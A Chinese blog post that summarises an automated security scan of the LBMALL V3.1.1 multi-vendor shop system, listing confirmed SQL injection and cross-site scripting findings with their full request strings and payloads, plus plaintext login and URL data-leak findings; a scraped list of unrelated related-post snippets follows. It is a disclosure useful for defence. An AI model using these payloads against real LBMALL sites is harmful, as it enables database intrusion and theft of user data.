paip. lbmall V3.1.1  乐彼多用户商城系统的安全漏洞总结

作者Attilax , 1466519819@qq.com
因为我的网站中账户模块是用LBMALL V3.1.1实现的..今天特意扫描了下它的安全漏洞,用的是HPWI9。。

结果发现了 32条高危漏洞

SQL注入(7个漏洞):
---------------------

Critical SQL 盲注(已确认) GET http://localhost/News/List.aspx (Query) tid=0&title=12345'%09OR%09(select%09Ascii(substring(db_name(dbid)%2c2%2c1))%09from%09master..sysprocesses%09where%09spid%3d%40%40SPID)%3c128%09OR%09'4'%3d'0
Critical SQL 注入(已确认)  POST http://localhost/admin/Commodity_Search.aspx (Post) __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUJODQ5NzM2MDQ2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUGSW1hZ2UxBQZJbWFnZTIFAnNqBQJ4agUGaW1nU3ViZ1vxx%2fp87cadH9Rzk8yLbdWuDOI%3d&hidsort=&Ima...
Critical SQL 注入(已确认)  POST http://localhost/admin/Commodity_Search.aspx (Post) __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUJODQ5NzM2MDQ2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUGSW1hZ2UxBQZJbWFnZTIFAnNqBQJ4agUGaW1nU3ViZ1vxx%2fp87cadH9Rzk8yLbdWuDOI%3d&hidsort=&Ima...
Critical SQL 注入(已确认)  POST http://localhost/admin/Commodity_Search.aspx (Post) __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUJODQ5NzM2MDQ2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUGSW1hZ2UxBQZJbWFnZTIFAnNqBQJ4agUGaW1nU3ViZ1vxx%2fp87cadH9Rzk8yLbdWuDOI%3d&hidsort=&Ima...
Critical SQL 注入(已确认)  GET http://localhost/ShopType.aspx (Query) keyword=12345&bprice=12345&eprice=12345%09and%09(select%09count(*)%09from%09spitable)%09%3d%091%09or%091%3d0%09&typeid=&id=1
Critical SQL 注入(已确认)  GET http://localhost/ShopType.aspx (Query) keyword=12345'%09and%09(select%09count(*)%09from%09spitable)%3d1%09or%09'1'%3d'0%09&bprice=12345&eprice=12345&typeid=&id=1
Critical SQL 注入(已确认)  GET http://localhost/ShopType.aspx (Query) typeid=0%09and%09(select%09count(*)%09from%09spitable)%09%3d%091%09or%091%3d0%09&id=1

XSS 跨站点脚本(7个漏洞):
---------------------
Critical 跨站点脚本 POST http://localhost/admin/AdminMessage_List.aspx (Post) __VIEWSTATE=%2fwEPDwUJNDg2ODAwMjM5ZGS1Pa6AspCR%2fQg9Erqa8s1q0Oltlw%3d%3d&hid_checkbox=&hid_page=&hid_type=&dateFrom=12345%27%3b%61%6c%65%72%74%28%38%31%36%33%33%29%2f%2f&dateTo=12345&txtSelectInfo=12345...
Critical 跨站点脚本 POST http://localhost/admin/AdminMessage_List.aspx (Post) __VIEWSTATE=%2fwEPDwUJNDg2ODAwMjM5ZGS1Pa6AspCR%2fQg9Erqa8s1q0Oltlw%3d%3d&hid_checkbox=&hid_page=&hid_type=&dateFrom=12345&dateTo=12345%27%3b%61%6c%65%72%74%28%38%31%36%33%33%29%2f%2f&txtSelectInfo=12345...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=1%2c&top=&rec=&arg=&check_=1&hidden_id0=1&txt_title0=titttttt...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=&rec=on&arg=on&check_=1&hidden_id0=1&txt_title0=Shipping%20Cl...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=&top=on&arg=on&check_=1&hidden_id0=1&txt_title0=Shipping%20Cl...
Critical 跨站点脚本 POST http://localhost/admin/ArticleList.aspx (Post) __VIEWSTATE=%2fwEPDwUKMjA4NDU3NjA4MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFA3RvcAUDcmVjBQNhcmfKFhJq8tBYTQ8jjy%2fg1kILXENtCQ%3d%3d&hid_i=&top=on&arg=on&check_=1&hidden_id0=1&txt_title0=Shipping%20Cl...
Critical 跨站点脚本 POST http://localhost/admin/Title.aspx (Post Multi-Part)
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?&hidden_id4=5&txt_name4=?&hidden_id5=6&txt_...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?%22%20%73%54%79%4c%65%3d%58%3a%65%58%2f%2a%...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=%22%20%73%54%79%4c%65%3d%58%3a%65%58%2f%2a%2a%2f%70%52%65%53%73%49%6f%4e%28%61%6c%65%72%74%28%36%34%31%33%34%29%29%20%2...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?&hidden_id4=5&txt_name4=?&hidden_id5=6&txt_...
Critical 跨站点脚本 POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?&hidden_id3=4&txt_name3=?&hidden_id4=5&txt_name4=?&hidden_id5=6&txt_...
Critical 跨站点脚本(用户交互)  POST http://localhost/admin/Title.aspx (Post Multi-Part)
Critical 跨站点脚本(用户交互)  POST http://localhost/admin/Title.aspx (Post Multi-Part)
Critical 跨站点脚本(用户交互)  POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?&hidden_id2=3&txt_name2=?%22%20%6f%4e%66%4f%63%55%73%3d%61%6c%65%72%74%28%37%33%35%31%33%29%2...
Critical 跨站点脚本(用户交互)  POST http://localhost/admin/Unitlist.aspx (Post) __VIEWSTATE=%2fwEPDwUKLTExMzA4MTUxMGRkrMCxSnaxmtwOAd2E5tGfX79hryg%3d&hidden_id0=1&txt_name0=?&hidden_id1=2&txt_name1=?%22%20%6f%4e%66%4f%63%55%73%3d%4d%73%67%42%6f%78%28%35%36%31%32%36%29%20%22&hidden_id2=3&txt_...

明文传输密码漏洞以及登录窗体敏感漏洞(5条)
--------------------------------------------------
High 通过未加密的连接发送登录信息  GET http://localhost/admin/Login.aspx
High 通过未加密的连接发送登录信息  GET http://localhost/Login.aspx (Query) uu=user/Default.aspx
High 通过未加密的连接发送登录信息  GET http://localhost/Login.aspx
High 未加密的登录窗体  GET http://localhost/admin/Login.aspx
High 未加密的登录窗体  GET http://localhost/Login.aspx (Query) uu=user/Default.aspx

敏感信息泄露URL/COOKIE/POST (13条)
---------------------------------
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Accounta.aspx (Query) uid=20&page=1
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Accounta.aspx (Query) uid=
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/AccountLog.aspx (Query) auname=asfda
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/AccountLog.aspx (Query) stime=12345&etime=12345&unames=12345&page=1
Medium Query 或 Cookie 中存在用户数据 POST http://localhost/admin/AccountLog.aspx (Query) auname=asfda (Post) __VIEWSTATE=%2fwEPDwUKMTE4MzA5MTAwN2Rk98WeigzHhrAdKMe3%2bv8Gy9tXMtw%3d&txt_starttime=12345&txt_endtime=12345&txt_username=12345&Submit.x=5&Submit.y=5&=26&=25&=24&=23&=22&=21&=20&=19&=18&=1...
Medium Query 或 Cookie 中存在用户数据 POST http://localhost/admin/AccountLog.aspx (Query) auname=asfda (Post) __VIEWSTATE=%2fwEPDwUKMTE4MzA5MTAwN2Rk98WeigzHhrAdKMe3%2bv8Gy9tXMtw%3d&txt_starttime=12345&txt_endtime=12345&txt_username=12345&Submit.x=5&Submit.y=5&=25&=24&=23&=22&=21&=20&=19&=18&=17&=1...
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/AccountLog.aspx (Query) auname=asfda&page=2
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Userlist.aspx (Query) usernames=12345&letime=12345&letime2=12345
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/admin/Userlist.aspx (Query) usernames=
Medium Query 或 Cookie 中存在用户数据 POST http://localhost/admin/Userlist.aspx (Query) usernames= (Post) __VIEWSTATE=%2fwEPDwUKLTc1MDEzNTU0N2Rki2tGFykf2v4TZF1Ik3esdjZtfhY%3d&txt_starttime=12345&txt_endtime=12345&txt_search=12345
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/Login.aspx (Query) uu=user/Default.aspx
Medium Query 或 Cookie 中存在用户数据 GET http://localhost/Login.aspx
Low “Admin”目录  GET http://localhost/admin/

paip. lbmall V3.1.1 乐彼多用户商城系统的安全漏洞总结相关推荐

  1. paip lbmall V3 1 1 乐彼多用户商城系统的安全漏洞总结

    paip. lbmall V3.1.1  乐彼多用户商城系统的安全漏洞总结 作者Attilax , 1466519819@qq.com 因为我的网站中账户模块是用LBMALL V3.1.1实现的..今 ...

  2. 2019多用户商城系统如何选,国内主流B2B2C商城对比

    国内,电商是每个网上做商务的企业绕不过去的一道坎,每个做电商的老板都有个阿里巴巴的梦想,但没有一款成熟且强大的多店铺网上商城系统作为后盾支持,如何在电商圈立足?在天猫.京东等多店铺网上商城发展得风生水 ...

  3. JAVA 多用户商城系统b2b2c-Spring Cloud常见问题与总结(一)

    在使用Spring Cloud的过程中,难免会遇到一些问题.所以对Spring Cloud的常用问题做一些总结.需要JAVA Spring Cloud大型企业分布式微服务云构建的B2B2C电子商务平台 ...

  4. SpringBoot b2b2c 多用户商城系统 ssm b2b2c

    来源: SpringBoot b2b2c 多用户商城系统 ssm b2b2c 用java实施的电子商务平台太少了,使用spring cloud技术构建的b2b2c电子商务平台更少,大型企业分布式互联网 ...

  5. 搭建B2B2C多用户商城系统需要注意的事项

    电商行业一直处于高速发展,每年的"6.18""11.11"都是电商的狂欢节,这让许多的传统企业非常眼热,很多传统企业纷纷都想加入电商渠道,开拓线上渠道,这就需要 ...

  6. JAVA 多用户商城系统b2b2c-服务容错保护(Hystrix依赖隔离)

    依赖隔离 "舱壁模式"对于熟悉Docker的读者一定不陌生,Docker通过"舱壁模式"实现进程的隔离,使得容器与容器之间不会互相影响.而Hystrix则使用该 ...

  7. 多用户商城系统 KgMall2.1公布

    2014-5-28日,广州JUULUU公布多用户商城系统 KgMall2.1,kgMall是国内一款JAVA开源多用户版商城系统,新版KgMall更加模块化,juuluu团队重构了Kgcms的多个模块 ...

  8. 小象电商是采用JAVA开发的B2B2C多用户商城系统。

    简介: 小象电商是采用JAVA开发的B2B2C多用户商城系统.以"平台自营+多商户入驻"为主要经营模式,可快速帮客户打造类似"京东"一样的自营+招商入驻的经营模 ...

  9. JAVA b2b2c多用户商城系统源码-服务发现服务端EurekaServer微服务

    一.大致介绍 1.众所周知,在现在互联网开发中,访问地址的IP和端口号是动态的,一个服务停掉再重新启用后IP和端口就可能发生了改变,所以用硬编码是肯定不行了.于是我们尝试使用新的技术来解决这一难题.需 ...

  10. 多用户商城系统有哪些盈利模式?

    来客电商是一款以B2B2C为核心商城系统,一键多平台开店,百种营销工具助力,解决拉新裂变瓶颈,系统稳定功能强大! 小程序/微信/H5/PC/APP(安卓.IOS)等多终端展示,以其丰富的营销功能,精细 ...

最新文章

  1. 独家 | 人工智能不能忽视符号逻辑以及原因
  2. 前端学习(2783):封装myrequest并绑定到全局
  3. array专题3-一道题目不断分析就会慢慢有了思路
  4. 用R在地图上绘制网络图的三种方法
  5. php注入类,简单实用的PHP防注入类实例_PHP
  6. 二分查找向上还是向下取整_二次构造柱泵向上输送方便还是向下输送方便
  7. Fence Repair(不会优先队列的看过来)
  8. 会声会影2022语音转文字功能怎么用
  9. 第四章——变换域处理方法
  10. bat批处理文件的简单解密方法(乱码)
  11. 一文读懂什么是聚合支付
  12. Ubuntu 16.04 安装运行 ROVIO odometry
  13. 七夕节送女朋友什么礼物最好、七夕最走心的礼物清单
  14. GAN 生成对抗网络 10-6 Tips for improving GAN
  15. Mysql之三少一多原则
  16. 马云被骗十亿?最后却被百倍奉还。
  17. 我的世界java百度什么电脑玩好_【我的世界】为了在龙芯电脑上玩Minecraft(我的世界)我做了什么_玩得好游戏攻略...
  18. Dnw下载工具还是Linux下的好(For OK6410)
  19. 日内趋势票如何把握?
  20. NNs(Neural Networks,神经网络)和Polynomial Regression(多项式回归)等价性之思考,以及深度模型可解释性原理研究与案例...

热门文章

  1. DB2 错误 54001
  2. 爱加密:APP安全防护 靠技术实力说爱你
  3. 一个比较完整的短信接口帮助类参考
  4. Android系统对应用程序权限申请的处理方式分析
  5. hdu 1575 Tr A (二分矩阵)
  6. innodb_file_per_table参数
  7. 从nginx访问日志中的400错误说起
  8. 【通信基础知识】白噪声、相关解调和相干解调
  9. MySQL-第二篇SQL语句基础(1)语句分类及DDL语句
  10. Docker Compose 笔记